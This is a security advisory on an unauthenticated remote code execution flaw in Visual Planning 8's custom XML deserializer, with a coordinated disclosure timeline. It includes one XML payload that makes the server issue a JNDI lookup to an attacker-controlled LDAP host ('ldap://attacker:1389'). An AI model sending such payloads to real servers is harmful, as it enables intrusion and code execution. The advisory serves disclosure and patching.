Security Advisory

Visual Planning 8 Unauthenticated Remote Code Execution

Unauthenticated adversaries can gain remote code execution by exploiting Visual Plannings custom XML deserializer.

Advisory ID: MLSA-2024-003
CVE: none
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Severity: critical
Affected versions: ≤ Build 240103
Fixed versions: Build 240612
Discovered by: Hans-Martin Münch

Product description

Visual Planning is much more than just scheduling software. It’s a complete, powerful, and flexible planning management solution, designed to meet the various needs of companies, whatever their sectors of activity or their products.

Details

Visual Planning includes “VPDesk,” a client based on Java Web Start. The VDesk client communicates with an XML-based web service, a typical XML message looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.NamedMethodParameter>
  <methodName>getPublicApplicationProperties</methodName>
  <rawResult>false</rawResult>
  <userSession isNull="true"/>
  <values>
      <HashtableValue>
        <key>ENCODING</key>
        <value class="String">MG6J5V2JQ29RT5L1</value>
     </HashtableValue>
   </values>
</com.visualplanning.query.NamedMethodParameter>            

Visual Planning uses a custom deserializer to process these messages, located in the class com.stilog.xml.SimpleXMLParser. Simplified, the deserializer allows the creation of JavaBeans from the provided XML document. It first invokes the class’s default constructor, then identifies the different setter methods (setName, setXXX) for the existing properties and invokes these methods. The process is very similar to common JSON deserializers like Jackson.

The Visual Planning deserializer does not provide any restrictions regarding the classes that can be deserialized, as long as they comply with the JavaBean standard and the class is known by the server.

An adversary who can communicate with the XML-based web service can force the deserializer into creating a new instance of a “dangerous” class and invoke the setter methods of this class. For example, by using the internal Java class JDBCRowSetImpl, it is possible to make an outgoing JNDI call to an attacker-controlled LDAP service.

<?xml version="1.0" encoding="UTF-8"?>
<com.sun.rowset.JdbcRowSetImpl>
  <dataSourceName>ldap://attacker:1389/o=reference</dataSourceName>
  <autoCommit>true</autoCommit>
</com.sun.rowset.JdbcRowSetImpl>

Visual Planning 8 is using Apache Tomcat which provides a known JNDI ObjectFactory that can be used to gain remote code execution.

Workarounds

None

Coordinated Disclosure Timeline

  • 10/06/2024 MOGWAI LABS requests a security contact through the official contact form
  • 11/06/2024 Response from Visual Planning sales, requesting technical details
  • 11/06/2024 MOGWAI LABS providing vulnerability details and examples
  • 12/06/2024 Response from the dev team, they implemented a patch and deployed it to a test instance
  • 12/06/2024 MOGWAI LABS performs a quick review of the implemented patch. Asks for a CVE and release plan.
  • 19/06/2024 MOGWAI LABS requests an update since we received no response on the previous mail.
  • 21/06/2024 Response from Visual Planning devs, they will not request a CVE. The question regaring the security update release was not answered.
  • 21/06/2024 Response from MOGWAI LABS with the question if they should request a CVE, also asking when the patch will be released.
  • 10/07/2024 Request from MOGWAI LABS, asking when the security update will be releases.
  • 10/07/2024 Response from Visual Planning, the build has already been release through their update portal, as part of the montly updates.
  • 10/07/2024 Public release of the security advisory.